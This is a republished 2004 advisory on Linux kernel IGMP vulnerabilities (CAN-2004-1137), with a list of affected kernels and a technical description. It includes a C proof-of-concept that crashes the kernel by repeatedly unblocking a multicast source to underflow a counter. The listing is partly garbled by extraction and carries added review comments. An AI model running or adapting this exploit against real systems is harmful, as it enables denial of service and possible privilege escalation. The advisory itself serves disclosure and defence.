Linux kernel IGMP multiple security vulnerabilities

xiaoxiao2021-03-06  47

Release Date: 2004-12-14

Update Date: 2004-12-15

Affected system:

Linux kernel 2.6.9

Linux kernel 2.6.8

Linux kernel 2.6.7

Linux kernel 2.6.6

Linux kernel 2.6.5

Linux kernel 2.6.4

Linux kernel 2.6.3

Linux kernel 2.6.2

Linux kernel 2.6.1

Linux kernel 2.6

Linux kernel 2.4.9

Linux kernel 2.4.8

Linux Kernel 2.4.7

Linux kernel 2.4.6

Linux kernel 2.4.5

Linux kernel 2.4.4

Linux kernel 2.4.3

Linux kernel 2.4.28

Linux kernel 2.4.27

Linux kernel 2.4.26

Linux kernel 2.4.25

Linux kernel 2.4.24

Linux kernel 2.4.23

Linux kernel 2.4.22

Linux kernel 2.4.21

Linux Kernel 2.4.20

Linux Kernel 2.4.2

Linux kernel 2.4.19

Linux kernel 2.4.18

Linux kernel 2.4.17

Linux kernel 2.4.16

Linux Kernel 2.4.15

Linux Kernel 2.4.14

Linux Kernel 2.4.13

Linux Kernel 2.4.12

Linux kernel 2.4.11

Linux kernel 2.4.10

Linux Kernel 2.4.1

Linux Kernel 2.4

description:

CVE (CAN) ID:

CAN-2004-1137

The Linux kernel is the kernel of the open source Linux operating system.

There are multiple security issues in the Linux IGMP networking module and the corresponding user APIs; local and remote attackers can use these vulnerabilities to escalate privileges or crash the kernel.

The problem is in the ip_mc_source() function, which can be called via the user API (IP_(UN)BLOCK_SOURCE, IP_ADD/DROP_SOURCE_MEMBERSHIP, MCAST_(UN)BLOCK_SOURCE and MCAST_JOIN/LEAVE_SOURCE_GROUP); it has several kernel crash and kernel memory overwrite issues.

By decrementing the 'sl_count' counter to 0xffffffff, the above function can be made to enter an infinite loop, which causes the kernel to crash.

The kmalloc-allocated kernel memory is then displaced by 4 bytes, which causes a sudden machine restart; this vulnerability can also be used to escalate privileges.

Because of the problem above, the ip_mc_msfget() and ip_mc_gsfget() functions can be made to read a large amount of kernel memory. This can also crash the system.

A further problem exists in the igmp_marksources() function in the network module, which is called when an IGMP group query is received from the network. Because the parameters of the received IGMP message are not fully validated, an out-of-bounds read of kernel memory can occur. If the Linux machine supports multicast, this vulnerability can be exploited remotely.

<* Source: Paul Starzetz

Paul@starzetz.de)

link:

http://marc.theaimsgroup.com/?l=bugtraq&m=110304192803108&w=2*>

testing method:

Warning: the following procedures (methods) may be offensive in nature and are provided only for security research and teaching. Use them at your own risk! Paul Starzetz (Paul@starzetz.de) provides the following test method:

/ *

* Linux IGMP.C Local DOS

* Warning: this code will crash your machine!

*

* GCC -O2 MREQFCK.C -O MREQFCK

*

* CopyRight (C) 2004 ISEC Security Research. All Rights Reserved.

*

* This Program Is for Educational Purposes * ONLY * IT IS Provided "As IS"

* And without any warranty. Copying, printing, distribution, modification

* WITHOUT Permission of The Author is strictly prohibited.

*

* /

/*
 * NOTE(review): the header names after each #include were lost when this
 * page was extracted (most likely the <...> parts were stripped as markup),
 * so the listing does not compile as shown.
 */
#include

#include

#include

#include

#include

#include

/*
 * Local numeric definitions used by the listing.
 * NOTE(review): identifier case on this page appears to have been altered by
 * extraction or translation; the code below refers to IP_BLOCK_SOURCE and
 * IP_UNBLOCK_SOURCE in upper case, and as written `ip_msfilter` would collide
 * with the struct tag of the same name declared below.
 * Presumably these mirror the kernel's socket option numbers and filter mode
 * constant -- confirm against the kernel headers of the release under test.
 */
#define mcast_include 1

#define ip_msfilter 41

#define ip_unblock_source 37

#define ip_block_source 38

/*
 * Local declaration of a multicast source filter record: five 32-bit fields,
 * the last being a one-element array.
 * NOTE(review): presumably mirrors the kernel's own structure of this name
 * (group address, interface, filter mode, source count, source list) --
 * confirm against the kernel headers. The keyword and field-name case has
 * been altered by page extraction, and the terminating ';' after the closing
 * brace is missing. The only variable of this type in main() is never used
 * in the visible code.
 */
Struct ip_msfilter

{

__U32 IMSF_MULTIADDR;

__U32 IMSF_INTERFACE;

__U32 IMSF_FMODE;

__U32 IMSF_NUMSRC;

__U32 IMSF_SLIST [1];

}

/*
 * Local declaration of the argument passed with the block/unblock source
 * socket options in main(): three 32-bit fields.
 * NOTE(review): field names here are upper case while main() assigns to
 * imr_multiaddr / imr_sourceaddr in lower case; the case mismatch looks like
 * page-extraction damage. The terminating ';' after the closing brace is
 * also missing.
 */
Struct ip_mreq_source

{

__U32 IMR_MULTIADDR;

__U32 IMR_INTERFACE;

__U32 IMR_SourceAddr;

}

/*
 * Error helper: prints `message` to stdout, appending the strerror() text
 * for errno when errno is non-zero, then flushes stdout and exits with
 * status 1. It never returns to the caller.
 *
 * NOTE(review): this listing is damaged by page extraction. Keyword and
 * function-name case is altered, the escape sequences appear as "/ n" and
 * "% s", the parameter is spelled `message` in the signature but `Message`
 * in the second call, and the parentheses of that call are unbalanced.
 */
Void

Fatal (const char * message)

{

Printf ("/ n");

// errno == 0: no system error to report, print the message only
IF (! errno)

{

FPRINTF (stdout, "fatal:% s / n", message);

}

Else

{

// errno set: append the system error text to the message
FPRINTF (stdout, "Fatal:% s (% s)", Message,

(CHAR *) (STRERROR (Errno));

}

Printf ("/ n");

Fflush (stdout);

Exit (1);

}

/*
 * Test driver for the source-filter accounting flaw described in the
 * advisory text above (CAN-2004-1137).
 *
 * Visible sequence: open a UDP socket, join multicast group 224.0.0.199,
 * block source 4.5.6.7 once, then unblock the same source three times.
 * Per the listing's own comments the filter count goes 1 -> 0 -> -1 and the
 * final call crashes the machine. Each setsockopt() result is checked and a
 * negative return ends the program through Fatal().
 *
 * Defender's reading: the kernel accepts removal of a source entry that is
 * no longer in the socket's filter list, so the per-socket counter drops
 * below zero. The remedy is a kernel update that fixes CAN-2004-1137; the
 * listing itself shows no workaround.
 *
 * NOTE(review): no privileged operation is visible in this listing --
 * confirm whether an unprivileged local user can reach this path on the
 * kernel under test.
 * NOTE(review): the listing is damaged by page extraction (altered
 * identifier and keyword case, e.g. S/s, MR/mr/Mr, MS/ms/Ms) and does not
 * compile as shown.
 */
int

Main ()

{

INT S, R, L;

Struct ip_mreqn mr;

// MSF, A1 and A2 are declared but never used in the visible code
Struct IP_MSFILTER MSF;

Struct ip_mreq_source ms;

IN_ADDR_T A1, A2;

s = Socket (AF_INET, SOCK_DGRAM, 0);

IF (s <0)

Fatal ("Socket");

// Step 1: join the multicast group, so the socket has a membership to
// attach source filters to

MEMSET (& MR, 0, SIZEOF (MR)); Mr.IMR_Multiaddr.s_addr = inet_addr ("224.0.0.199");

L = SizeOf (MR);

R = setsockopt (S, SOL_IP, IP_ADD_MEMBERSHIP, & MR, L);

IF (r <0)

Fatal ("setsockopt");

// Step 2: add one blocked source; filter count becomes 1

MEMSET (& MS, 0, SIZEOF (MS));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

Ms.imr_sourceaddr = inet_addr ("4.5.6.7");

L = SizeOf (MS);

R = setsockopt (S, SOL_IP, IP_BLOCK_SOURCE, & MS, L);

IF (r <0)

Fatal ("Setsockopt2");

// Step 3: remove that source; filter count becomes 0

// imr_multiaddr and imr_interface must match the values used when adding

MEMSET (& MS, 0, SIZEOF (MS));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

Ms.imr_sourceaddr = inet_addr ("4.5.6.7");

L = SizeOf (MS);

R = setsockopt (S, SOL_IP, IP_UNBLOCK_SOURCE, & MS, L);

IF (r <0)

// NOTE(review): reuses the "Setsockopt2" label of the previous call, so a
// failure here cannot be told apart from a failure in step 2
Fatal ("Setsockopt2");

// Step 4: remove the same source again although the list is already empty;
// per the original comment the count becomes -1. A fixed kernel should
// reject this request instead of decrementing the counter.

MEMSET (& MS, 0, SIZEOF (MS));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

Ms.imr_sourceaddr = inet_addr ("4.5.6.7");

L = SizeOf (MS);

R = setsockopt (S, SOL_IP, IP_UNBLOCK_SOURCE, & MS, L);

IF (r <0)

Fatal ("setsockopt3");

// Step 5: one more removal with the counter already negative; the original
// comment marks this call as the one that crashes the machine

MEMSET (& MS, 0, SIZEOF (MS));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

Ms.imr_sourceaddr = inet_addr ("4.5.6.7");

L = SizeOf (MS);

R = setsockopt (S, SOL_IP, IP_UNBLOCK_SOURCE, & MS, L);

IF (r <0)

Fatal ("Setsockopt4");

// Reached only if the last call returned; waits for a key press before exit
GetChar ();

Return 0;

}

Suggest:

Vendor patch:

Linux

-----

At present, the vendor has not provided a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:

http://www.kernel.org/
